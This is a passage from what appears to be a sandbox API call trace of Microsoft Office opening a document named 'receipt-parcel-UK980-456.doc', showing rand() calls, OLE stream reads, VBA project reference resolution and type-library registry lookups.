[0016.962] rand () returned 16063 [0016.962] rand () returned 30463 [0016.962] rand () returned 24163 [0016.962] rand () returned 10684 [0016.962] rand () returned 27988 [0016.962] rand () returned 29462 [0016.962] rand () returned 27615 [0016.962] rand () returned 12361 [0016.962] rand () returned 12270 [0016.962] rand () returned 32455 [0016.962] rand () returned 19344 [0016.962] rand () returned 4390 [0016.962] rand () returned 29891 [0016.962] rand () returned 17470 [0016.962] rand () returned 24709 [0016.962] rand () returned 15992 [0016.962] rand () returned 21368 [0016.962] rand () returned 29281 [0016.962] rand () returned 31899 [0016.962] rand () returned 26360 [0016.962] rand () returned 4847 [0016.962] rand () returned 31574 [0016.962] rand () returned 13554 [0016.962] rand () returned 18585 [0016.962] rand () returned 16736 [0016.962] rand () returned 7237 [0016.962] rand () returned 23197 [0016.962] rand () returned 5740 [0016.962] rand () returned 4779 [0016.962] rand () returned 4703 [0016.962] rand () returned 27550 [0016.962] rand () returned 30144 [0016.962] rand () returned 30956 [0016.962] rand () returned 8479 [0016.962] rand () returned 4113 [0016.962] rand () returned 22157 [0016.962] rand () returned 11088 [0016.962] rand () returned 19919 [0016.962] rand () returned 30631 [0016.962] rand () returned 11027 [0016.962] rand () returned 3880 [0016.962] rand () returned 29775 [0016.962] rand () returned 11094 [0016.962] rand () returned 17086 [0016.962] rand () returned 14140 [0016.962] rand () returned 6418 [0016.962] rand () returned 10063 [0016.962] rand () returned 19533 [0016.962] rand () returned 28002 [0016.962] rand () returned 7273 [0016.962] rand () returned 20785 [0016.962] rand () returned 17203 [0016.962] rand () returned 31311 [0016.962] rand () returned 13060 [0016.962] rand () returned 7804 [0016.962] rand () returned 19517 [0016.962] rand () returned 8108 [0016.962] rand () returned 18357 [0016.962] rand () returned 32584 [0016.962] rand () returned 17782 [0016.962] rand () returned 30829 [0016.963] rand () returned 10872 [0016.963] rand () returned 24887 [0016.963] rand () returned 3400 [0016.963] rand () returned 13150 [0016.963] rand () returned 12465 [0016.963] rand () returned 24232 [0016.963] rand () returned 17635 [0016.963] rand () returned 23550 [0016.963] rand () returned 10932 [0016.963] rand () returned 28205 [0016.963] rand () returned 4579 [0016.963] rand () returned 9617 [0016.963] rand () returned 21130 [0016.963] rand () returned 9792 [0016.963] rand () returned 9004 [0016.963] rand () returned 27761 [0016.963] rand () returned 6131 [0016.963] rand () returned 26929 [0016.963] rand () returned 32025 [0016.963] rand () returned 24997 [0016.963] rand () returned 28071 [0016.963] rand () returned 3427 [0016.963] rand () returned 20695 [0016.963] rand () returned 5300 [0016.963] rand () returned 31713 [0016.963] rand () returned 21944 [0016.963] rand () returned 25355 [0016.963] rand () returned 20411 [0016.963] rand () returned 23582 [0016.963] rand () returned 20042 [0016.963] rand () returned 17851 [0016.963] rand () returned 31166 [0016.963] rand () returned 16930 [0016.963] rand () returned 24924 [0016.963] rand () returned 26987 [0016.963] rand () returned 29500 [0016.963] rand () returned 13885 [0016.963] rand () returned 14480 [0016.963] rand () returned 18822 [0016.963] rand () returned 8454 [0016.963] rand () returned 17612 [0016.963] rand () returned 15962 [0016.963] rand () returned 14336 [0016.963] rand () returned 6481 [0016.963] rand () returned 18178 [0016.963] rand () returned 21428 [0016.963] rand () returned 3130 [0016.963] rand () returned 9993 [0016.963] rand () returned 10473 [0016.963] rand () returned 3603 [0016.963] rand () returned 14630 [0016.963] rand () returned 5992 [0016.963] rand () returned 20643 [0016.963] rand () returned 4506 [0016.963] rand () returned 3755 [0016.963] rand () returned 1480 [0016.963] rand () returned 2806 [0016.963] rand () returned 23438 [0016.963] rand () returned 10827 [0016.963] rand () returned 6581 [0016.963] rand () returned 8456 [0016.963] rand () returned 4363 [0016.963] rand () returned 23299 [0016.964] rand () returned 27463 [0016.964] rand () returned 31590 [0016.964] rand () returned 9717 [0016.964] rand () returned 31858 [0016.964] rand () returned 430 [0016.964] rand () returned 30283 [0016.964] rand () returned 28720 [0016.964] rand () returned 3390 [0016.964] rand () returned 8207 [0016.964] rand () returned 19232 [0016.964] rand () returned 31508 [0016.964] rand () returned 1204 [0016.964] rand () returned 21647 [0016.964] rand () returned 13119 [0016.964] rand () returned 12059 [0016.964] rand () returned 11182 [0016.964] rand () returned 32173 [0016.964] rand () returned 10236 [0016.964] rand () returned 8669 [0016.964] rand () returned 31930 [0016.964] rand () returned 14804 [0016.964] rand () returned 25574 [0016.964] rand () returned 8767 [0016.964] rand () returned 20344 [0016.964] rand () returned 30000 [0016.964] rand () returned 2378 [0016.964] rand () returned 21735 [0016.964] rand () returned 21316 [0016.964] rand () returned 2498 [0016.964] rand () returned 4601 [0016.964] rand () returned 29939 [0016.964] rand () returned 7445 [0016.964] rand () returned 9647 [0016.964] rand () returned 27723 [0016.964] rand () returned 3306 [0016.964] rand () returned 19621 [0016.964] rand () returned 27614 [0016.964] rand () returned 26980 [0016.964] rand () returned 15346 [0016.964] rand () returned 3283 [0016.964] rand () returned 705 [0016.964] rand () returned 24758 [0016.964] rand () returned 23364 [0016.964] rand () returned 29509 [0016.964] rand () returned 1395 [0016.964] rand () returned 11463 [0016.964] rand () returned 6110 [0016.964] rand () returned 849 [0016.964] rand () returned 2820 [0016.964] rand () returned 25909 [0016.964] rand () returned 21623 [0016.964] rand () returned 22558 [0016.964] rand () returned 14353 [0016.964] rand () returned 31223 [0016.964] rand () returned 26552 [0016.964] rand () returned 14854 [0016.964] rand () returned 3735 [0016.964] rand () returned 5093 [0016.964] rand () returned 2729 [0016.965] rand () returned 9023 [0016.965] rand () returned 28680 [0016.965] CoCreateGuid (in: pguid=0x79e02b8 | out: pguid=0x79e02b8*(Data1=0xeb17b9ec, Data2=0xb689, Data3=0x4c7b, Data4=([0]=0xb5, [1]=0x90, [2]=0xd8, [3]=0x4c, [4]=0x69, [5]=0x94, [6]=0x5b, [7]=0x3b))) returned 0x0 [0016.965] strcpy_s (in: _Dst=0x79e0318, _DstSize=0x1, _Src="" | out: _Dst="") returned 0x0 [0016.965] CExposedDocFile::OpenStream () returned 0x0 [0016.965] CExposedStream::Read () returned 0x0 [0016.965] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x2028) returned 0x7a76690 [0016.965] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x10020*=0x10128) returned 0xbcb0080 [0016.966] CExposedStream::AddRef () returned 0x2 [0016.966] CExposedStream::Release () returned 0x1 [0016.966] CExposedStream::Read () returned 0x0 [0016.966] CExposedStream::Read () returned 0x0 [0016.967] CompareStringA (Locale=0x409, dwCmpFlags=0x3, lpString1="Test", cchCount1=-1, lpString2="Test", cchCount2=-1) returned 2 [0016.967] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x286ae4, cbMultiByte=2, lpWideCharStr=0x286af8, cchWideChar=2 | out: lpWideCharStr="") returned 2 [0016.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=8, lpMultiByteStr=0x286a70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0016.967] lstrcmpiA (lpString1="", lpString2="Project") returned -1 [0016.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0016.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x286970, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0016.967] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project") returned 0x10ae2d [0016.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=8, lpMultiByteStr=0x286880, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0016.967] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project") returned 0x10ae2d [0016.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=8, lpMultiByteStr=0x286880, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0016.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=8, lpMultiByteStr=0x286740, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0016.967] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project") returned 0x10ae2d [0016.967] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project") returned 0x10ae2d [0016.967] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x18) returned 0x79774a0 [0016.967] IMalloc:Free (This=0x7fefe9e5380, pv=0x78322e0) [0016.967] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x78322e0 [0016.967] IMalloc:Free (This=0x7fefe9e5380, pv=0x79774a0) [0016.967] strcpy_s (in: _Dst=0x79e0328, _DstSize=0x8, _Src="Project" | out: _Dst="Project") returned 0x0 [0016.969] wcscpy_s (in: _Destination=0x7a78980, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 0x0 [0016.969] wcsncpy_s (in: _Destination=0x2866d0, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 0x0 [0016.969] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\syswow64\\stdole2.tlb#ole automation") returned 0x5e [0016.969] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xbe) returned 0x77e7ad0 [0016.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\syswow64\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x77e7ad0, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\syswow64\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0016.969] IMalloc:Free (This=0x7fefe9e5380, pv=0x77e7ad0) [0016.969] wcscpy_s (in: _Destination=0x72a1870, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 0x0 [0016.969] wcsncpy_s (in: _Destination=0x286710, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation") returned 0x0 [0016.969] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\SysWOW64\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\syswow64\\stdole2.tlb#ole automation") returned 0x5e [0016.969] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xbe) returned 0x77e7ad0 [0016.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\syswow64\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x77e7ad0, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\syswow64\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0016.969] IMalloc:Free (This=0x7fefe9e5380, pv=0x77e7ad0) [0016.969] wcsncpy_s (in: _Destination=0x2866d0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0x0 [0016.969] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", cchLength=0x39 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc") returned 0x39 [0016.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", cchWideChar=58, lpMultiByteStr=0x286600, cbMultiByte=116, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", lpUsedDefaultChar=0x0) returned 58 [0016.969] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0 [0016.970] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0016.970] strcpy_s (in: _Dst=0x286790, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0016.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286790, cbMultiByte=7, lpWideCharStr=0x2865e0, cchWideChar=7 | out: lpWideCharStr="stdole") returned 7 [0016.970] IUnknown:AddRef (This=0x788e200) returned 0x3 [0016.970] ITypeLib:RemoteIsName (in: This=0x788e200, szNameBuf="stdole", lHashVal=0x106093, pfName=0x2866b0, pBstrLibName=0x2865e0 | out: pfName=0x2866b0*=0, pBstrLibName=0x2865e0) returned 0x0 [0016.970] IUnknown:Release (This=0x788e200) returned 0x2 [0016.970] IUnknown:AddRef (This=0x72e0930) returned 0x3 [0016.970] ITypeLib:RemoteIsName (in: This=0x72e0930, szNameBuf="stdole", lHashVal=0x106093, pfName=0x2866b0, pBstrLibName=0x2865e0 | out: pfName=0x2866b0*=0, pBstrLibName=0x2865e0) returned 0x0 [0016.970] IUnknown:Release (This=0x72e0930) returned 0x2 [0016.970] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x208) returned 0x788f870 [0016.970] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x285d90 | out: phkResult=0x285d90*=0x9a2) returned 0x0 [0016.970] RegOpenKeyW (in: hKey=0x9a2, lpSubKey="{00020430-0000-0000-C000-000000000046}", phkResult=0x285d88 | out: phkResult=0x285d88*=0x9aa) returned 0x0 [0016.970] RegEnumKeyW (in: hKey=0x9aa, dwIndex=0x0, lpName=0x285db8, cchName=0xa | out: lpName="1.0") returned 0x0 [0016.970] RegEnumKeyW (in: hKey=0x9aa, dwIndex=0x1, lpName=0x285db8, cchName=0xa | out: lpName="2.0") returned 0x0 [0016.970] wcscpy_s (in: _Destination=0x285da0, _SizeInWords=0xa, _Source="2.0" | out: _Destination="2.0") returned 0x0 [0016.970] RegOpenKeyW (in: hKey=0x9aa, lpSubKey="2.0", phkResult=0x285e48 | out: phkResult=0x285e48*=0x9a6) returned 0x0 [0016.971] _ultoa_s (in: _Val=0x0, _DstBuf=0x285dc0, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0016.971] RegOpenKeyA (in: hKey=0x9a6, lpSubKey="0", phkResult=0x285db0 | out: phkResult=0x285db0*=0x9ae) returned 0x0 [0016.971] RegOpenKeyW (in: hKey=0x9ae, lpSubKey="win64", phkResult=0x285db8 | out: phkResult=0x285db8*=0x9b2) returned 0x0 [0016.971] RegCloseKey (hKey=0x9b2) returned 0x0 [0016.971] RegCloseKey (hKey=0x9ae) returned 0x0 [0016.971] _ultow_s (in: _Value=0x0, _Buffer=0x285e50, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0016.971] RegOpenKeyW (in: hKey=0x9a6, lpSubKey="0", phkResult=0x285e28 | out: phkResult=0x285e28*=0x9ae) returned 0x0 [0016.971] RegQueryValueW (in: hKey=0x9ae, lpSubKey="win64", lpData=0x285e70, lpcbData=0x285e24 | out: lpData="C:\\Windows\\system32\\stdole2.tlb", lpcbData=0x285e24) returned 0x0 [0016.972] wcscpy_s (in: _Destination=0x788f870, _SizeInWords=0x104, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0016.972] RegCloseKey (hKey=0x9ae) returned 0x0 [0016.972] RegCloseKey (hKey=0x9a6) returned 0x0 [0016.972] RegCloseKey (hKey=0x9aa) returned 0x0 [0016.972] RegCloseKey (hKey=0x9a2) returned 0x0 [0016.972] IUnknown:QueryInterface (in: This=0x72df850, riid=0x7fef1036290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x286298 | out: ppvObject=0x286298*=0x0) returned 0x80004002 [0016.972] ITypeLib:RemoteGetLibAttr (in: This=0x72df850, ppTLibAttr=0x286290, pDummy=0x10 | out: ppTLibAttr=0x286290, pDummy=0x10) returned 0x0 [0016.972] ITypeLib:RemoteGetDocumentation (in: This=0x72df850, index=-1, refPtrFlags=0x0, pbstrName=0x286288, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x7a578b6 | out: pbstrName=0x286288*="OLE Automation", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x7a578b6) returned 0x0 [0016.972] StringFromGUID2 (in: rguid=0x7832160*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x2862b0, cchMax=39 | out: lpsz="{00020430-0000-0000-C000-000000000046}") returned 39 [0016.972] _ultow_s (in: _Value=0x2, _Buffer=0x2861fa, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0016.972] _ultow_s (in: _Value=0x0, _Buffer=0x2861fe, _BufferCount=0xe, _Radix=16 | out: _Buffer="0") returned 0x0 [0016.972] _ultow_s (in: _Value=0x0, _Buffer=0x286202, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0016.972] wcscpy_s (in: _Destination=0x7a57938, _SizeInWords=0x5f, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0016.972] wcscpy_s (in: _Destination=0x7a5793e, _SizeInWords=0x5c, _Source="{00020430-0000-0000-C000-000000000046}" | out: _Destination="{00020430-0000-0000-C000-000000000046}") returned 0x0 [0016.972] wcscpy_s (in: _Destination=0x7a5798a, _SizeInWords=0x36, _Source="#2.0#0#" | out: _Destination="#2.0#0#") returned 0x0 [0016.972] wcscpy_s (in: _Destination=0x7a57998, _SizeInWords=0x2f, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0016.972] wcscpy_s (in: _Destination=0x7a579d8, _SizeInWords=0xf, _Source="OLE Automation" | out: _Destination="OLE Automation") returned 0x0 [0016.972] ITypeLib:LocalReleaseTLibAttr (This=0x72df850) returned 0x0 [0016.972] wcscpy_s (in: _Destination=0x7a78a40, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0016.972] IMalloc:Free (This=0x7fefe9e5380, pv=0x788f870) [0016.972] ITypeLib:RemoteIsName (in: This=0x72df850, szNameBuf="stdole", lHashVal=0x106093, pfName=0x2866b0, pBstrLibName=0x2865e0 | out: pfName=0x2866b0*=0, pBstrLibName=0x2865e0) returned 0x0 [0016.972] IUnknown:Release (This=0x72df850) returned 0x4 [0016.972] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x24) returned 0x7831c80 [0016.972] IMalloc:Free (This=0x7fefe9e5380, pv=0x77de1d0) [0016.972] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x7831cb0 [0016.973] IMalloc:Free (This=0x7fefe9e5380, pv=0x7831c80) [0016.974] wcscpy_s (in: _Destination=0x7a789a8, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0016.974] wcsncpy_s (in: _Destination=0x2866d0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0016.974] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0016.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x286600, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0016.974] wcscpy_s (in: _Destination=0x551e6a0, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0016.974] wcsncpy_s (in: _Destination=0x286710, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0016.974] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0016.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x286640, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0016.974] wcsncpy_s (in: _Destination=0x2866d0, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0x0 [0016.974] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", cchLength=0x39 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc") returned 0x39 [0016.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", cchWideChar=58, lpMultiByteStr=0x286600, cbMultiByte=116, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt-parcel-uk980-456.doc", lpUsedDefaultChar=0x0) returned 58 [0016.974] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt-parcel-UK980-456.doc") returned 0 [0016.975] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0016.975] strcpy_s (in: _Dst=0x286790, _DstSize=0x7, _Src="Normal" | out: _Dst="Normal") returned 0x0 [0016.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286790, cbMultiByte=7, lpWideCharStr=0x2865e0, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0016.975] IUnknown:AddRef (This=0x788e200) returned 0x3 [0016.975] ITypeLib:RemoteIsName (in: This=0x788e200, szNameBuf="Normal", lHashVal=0x10d8df, pfName=0x2866b0, pBstrLibName=0x2865e0 | out: pfName=0x2866b0*=0, pBstrLibName=0x2865e0) returned 0x0 [0016.975] IUnknown:Release (This=0x788e200) returned 0x2 [0016.975] IUnknown:AddRef (This=0x72e0930) returned 0x3 [0016.975] ITypeLib:RemoteIsName (in: This=0x72e0930, szNameBuf="Normal", lHashVal=0x10d8df, pfName=0x2866b0, pBstrLibName=0x2865e0 | out: pfName=0x2866b0*=0, pBstrLibName=0x2865e0) returned 0x0 [0016.975] IUnknown:Release (This=0x72e0930) returned 0x2 [0016.975] IUnknown:AddRef (This=0x72df850) returned 0x5 [0016.975] ITypeLib:RemoteIsName (in: This=0x72df850, szNameBuf="Normal", lHashVal=0x10d8df, pfName=0x2866b0, pBstrLibName=0x2865e0 | out: pfName=0x2866b0*=0, pBstrLibName=0x2865e0) returned 0x0 [0016.975] IUnknown:Release (This=0x72df850) returned 0x4 [0016.975] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x30) returned 0x781a820 [0016.975] IMalloc:Free (This=0x7fefe9e5380, pv=0x78a03b0) [0016.975] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x78322e0 [0016.975] IMalloc:Free (This=0x7fefe9e5380, pv=0x781a820) [0016.975] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x9a) returned 0x7a63760 [0016.975] IMalloc:Free (This=0x7fefe9e5380, pv=0x7a63760) [0016.975] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x8c) returned 0x77c9930 [0016.975] _ultow_s (in: _Value=0x2, _Buffer=0x28690a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0016.975] _ultow_s (in: _Value=0x8, _Buffer=0x28690e, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0016.975] _ultow_s (in: _Value=0x0, _Buffer=0x286912, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0016.975] wcscpy_s (in: _Destination=0x79dd968, _SizeInWords=0x9b, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0016.975] wcscpy_s (in: _Destination=0x79dd96e, _SizeInWords=0x98, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0016.975] wcscpy_s (in: _Destination=0x79dd9ba, _SizeInWords=0x72, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0016.975] wcscpy_s (in: _Destination=0x79dd9c8, _SizeInWords=0x6b, _Source="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" | out: _Destination="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL") returned 0x0 [0016.976] wcscpy_s (in: _Destination=0x79dda54, _SizeInWords=0x25, _Source="Microsoft Office 16.0 Object Library" | out: _Destination="Microsoft Office 16.0 Object Library") returned 0x0 [0016.976] IMalloc:Free (This=0x7fefe9e5380, pv=0x77c9930) [0016.976] wcscpy_s (in: _Destination=0x7a78b00, _SizeInWords=0x9b, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0016.976] wcsncpy_s (in: _Destination=0x2866d0, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library") returned 0x0 [0016.976] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft Office 16.0 Object Library", cchLength=0x9a | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files (x86)\\common files\\microsoft shared\\office16\\mso.dll#microsoft office 16.0 object library") returned 0x9a [0016.976] IMalloc:Alloc 